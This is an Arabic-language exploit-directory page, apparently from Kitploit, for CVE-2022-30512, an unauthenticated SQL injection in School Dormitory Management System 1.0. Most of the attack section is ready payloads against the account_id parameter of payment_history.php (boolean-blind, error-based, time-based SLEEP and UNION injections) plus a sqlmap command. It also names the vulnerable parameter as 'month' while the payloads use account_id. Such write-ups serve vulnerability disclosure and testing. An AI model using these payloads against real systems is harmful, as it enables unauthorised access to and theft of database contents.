Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/bigzooooz/cve-2022-30512
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubbigzooooz/cve-2022-30512

CVE-2022-30512

نظام إدارة مساكن الطلاب 1.0 - حقن SQL بدون مصادقة

عرض المستودع
1منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2022-30512

نظام إدارة المهجع المدرسي 1.0 - حقن SQL غير مصادق عليه

عنوان الاستغلال: نظام إدارة المهجع المدرسي 1.0 - حقن SQL غير مصادق عليه

التاريخ: 2022-05-25

CVE: CVE-2022-30512

مؤلف الاستغلال: عبدالعزيز سعد (@b4zb0z)

الصفحة الرئيسية للبائع: https://www.sourcecodester.com/

رابط البرنامج:

https://www.sourcecodester.com/php/15319/school-dormitory-management-system-phpoop-free-source-code.html

الإصدار: 1.0

تم الاختبار على: LAMP, Ubuntu


[#] موقع الثغرة: $_GET['month'] في /dms/admin/accounts/payment_history.php:31

root@kitploit:~
الباراميتر: account_id (GET)
root@kitploit:~
النوع: أعمى قائم على Boolean
العنوان: AND boolean-based blind - WHERE or HAVING clause
الحمولة: account_id=2' AND 6703=6703 AND 'jmUS'='jmUS
root@kitploit:~
النوع: قائم على الخطأ
root@kitploit:~
العنوان: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
الحمولة: account_id=2' AND (SELECT 7343 FROM(SELECT COUNT(*),CONCAT(0x71716b7671,(SELECT (ELT(7343=7343,1))),0x7170626a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'htiO'='htiO
root@kitploit:~
النوع: أعمى قائم على الوقت
root@kitploit:~
العنوان: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
الحمولة: account_id=2' AND (SELECT 2865 FROM (SELECT(SLEEP(5)))hWAb) AND 'pbGX'='pbGX
root@kitploit:~
النوع: استعلام UNION
root@kitploit:~
العنوان: Generic UNION query (NULL) - 7 columns
الحمولة: account_id=2' UNION ALL SELECT CONCAT(0x71716b7671,0x6458467273575152444c465a7a5276684f74756c7a754b6d506a6c437a5a516479574d5844694b78,0x7170626a71),NULL,NULL,NULL,NULL,NULL,NULL-- -

[#] الاستغلال باستخدام SQLMAP: sqlmap -u "http://localhost/dms/admin/accounts/payment_history.php?account_id=2" --dbms=mysql

تنزيل الأداة